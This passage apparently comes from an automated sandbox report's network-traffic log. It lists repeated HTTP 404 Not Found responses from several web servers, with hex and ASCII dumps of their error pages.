68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1163date: Mon, 18 Mar 2024 13:46:41 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1163date: Mon, 18 Mar 2024 13:46:44 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1163date: Mon, 18 Mar 2024 13:46:47 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 13:47:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/7.0.28Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 13:47:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/7.0.28Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 13:47:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/7.0.28Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 13:47:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/7.0.28Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 13:47:36 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 13:47:39 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 13:47:42 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 13:47:45 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 18 Mar 2024 13:48:05 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f c3 30 0c 85 ef fd 15 66 27 38 2c ee a6 4e e2 10 45 82 b5 13 93 ca a8 20 3d ec 98 35 9e 52 69 6b 4a 92 52 f8 f7 a4 9d 90 b8 d8 7a f6 e7 a7 67 7e 97 bf 6d e5 b1 2a e0 45 be 96 50 d5 cf e5 7e 0b 8b 25 e2 be 90 3b c4 5c e6 b7 cd 9a a5 88 c5 61 21 12 6e c2 f5 22 b8 21 a5 a3 08 6d b8 90 c8 d2 0c 0e 36 c0 ce 0e 9d e6 78 1b 26 1c 67 88 9f ac fe 99 ee 56 e2 1f 13 55 c2 7b 21 0d 81 a3 cf 81 7c 20 0d f5 7b 09 a3 f2 d0 45 ee 3c 71 60 3b 08 a6 f5 e0 c9 7d 91 63 1c fb c9 c9 c5 a2 b4 76 e4 bd 78 ea 55 63 08 d7 2c 63 9b 0d dc d7 5d fb fd 00 1f 33 0e 2a c0 38 8e ac 77 76 49 8d 8d 4d 0f 4d 60 8d bd 42 65 5d 80 c7 94 e3 9f 4d 4c 3b e7 8c c9 a6 ff 92 5f 9e 74 ec 98 1a 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: ecMAO0f'8,NE =5RikJRzg~m*EP~%;\a!n"!m6x&gVU{!| {E<q`;}cvxUc,c]3*8wvIMM`Be]ML;_t0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 18 Mar 2024 13:48:07 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f c3 30 0c 85 ef fd 15 66 27 38 2c ee a6 4e e2 10 45 82 b5 13 93 ca a8 20 3d ec 98 35 9e 52 69 6b 4a 92 52 f8 f7 a4 9d 90 b8 d8 7a f6 e7 a7 67 7e 97 bf 6d e5 b1 2a e0 45 be 96 50 d5 cf e5 7e 0b 8b 25 e2 be 90 3b c4 5c e6 b7 cd 9a a5 88 c5 61 21 12 6e c2 f5 22 b8 21 a5 a3 08 6d b8 90 c8 d2 0c 0e 36 c0 ce 0e 9d e6 78 1b 26 1c 67 88 9f ac fe 99 ee 56 e2 1f 13 55 c2 7b 21 0d 81 a3 cf 81 7c 20 0d f5 7b 09 a3 f2 d0 45 ee 3c 71 60 3b 08 a6 f5 e0 c9 7d 91 63 1c fb c9 c9 c5 a2 b4 76 e4 bd 78 ea 55 63 08 d7 2c 63 9b 0d dc d7 5d fb fd 00 1f 33 0e 2a c0 38 8e ac 77 76 49 8d 8d 4d 0f 4d 60 8d bd 42 65 5d 80 c7 94 e3 9f 4d 4c 3b e7 8c c9 a6 ff 92 5f 9e 74 ec 98 1a 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: ecMAO0f'8,NE =5RikJRzg~m*EP~%;\a!n"!m6x&gVU{!| {E<q`;}cvxUc,c]3*8wvIMM`Be]ML;_t0
